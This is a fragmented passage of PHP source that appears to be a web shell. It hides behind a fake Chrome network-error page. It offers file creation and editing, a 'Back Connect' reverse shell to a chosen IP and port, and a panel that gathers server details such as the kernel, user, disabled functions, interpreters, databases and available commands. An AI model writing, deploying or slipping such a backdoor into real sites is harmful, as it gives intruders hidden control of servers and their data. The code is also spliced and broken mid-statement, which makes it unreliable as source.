$host
" . htmlspecialchars($_SERVER['HTTP_HOST']) . " unexpectedly closed the connection.
"; echo "Try:
ERR_NAME_NOT_RESOLVED
Check any cables and reboot any routers, modems, or other network devices you may be using.
If it is already listed as a program allowed to access the network, try removing it from the list and adding it again.
Check your proxy settings or contact your network administrator to make sure the proxy server is working. If you don't believe you should be using a proxy server: Go to the Chrome menu > Settings > Show advanced settings… > Change proxy settings… > LAN Settings and deselect 'Use a proxy server for your LAN'.
Please enter a filename.
"; } else { $fname = basename($fname); $filepath = "$dir/$fname"; if (file_exists($filepath)) { echo "File '$fname' already exists!
"; } else { if (touch($filepath)) { echo "File '$fname' created successfully!
"; pindah("?edit=$filepath&dir=$dir"); } else { echo "Error: Unable to create the file. Check permissions.
"; } } } } } elseif (isset($_GET['edit'])) { $save = $_GET['edit']; $cont = htmlspecialchars(file_get_contents($save)); echo "Back Connect initiated to $ip:$port.
"; } else { echo "Back Connect failed. Ensure the listener is set up on the target machine.
"; } } else { echo "Invalid IP address or port number.
"; } } } elseif (isset($_GET['info_php'])) { echo "Server | $serverName | Server IP: $serverIP | Your IP: $clientIP |
Kernel Version | " . trim($kernelVersion) . " |
Software | $software |
Storage Space | {$diskUsed} GB / {$diskTotal} GB (Free: {$diskFree} GB) |
Time On Server | " . date("d M Y h:i:s A") . " |
User / Group | ($user) | ($group) |
PHP Version | $phpVersion on $sapi | Magic Quotes: $magicQuotes |
More Info | Safe Mode: $safeMode | Open Base Dir: $openBasedir | Safe Mode Exec Dir: $safeModeExecDir | Safe Mode Include Dir: $safeModeIncludeDir |
Database | MySQL: $mysql | MSSQL: $mssql | PostgreSQL: $pgsql | Oracle: $oracle |
Software | Perl: $perl | Python: $python | Ruby: $ruby |
Disabled Functions | " . ($disabledFunctions ? $disabledFunctions : 'None') . " |
Linux Commands | " . implode(' | ', $commandStatus) . " |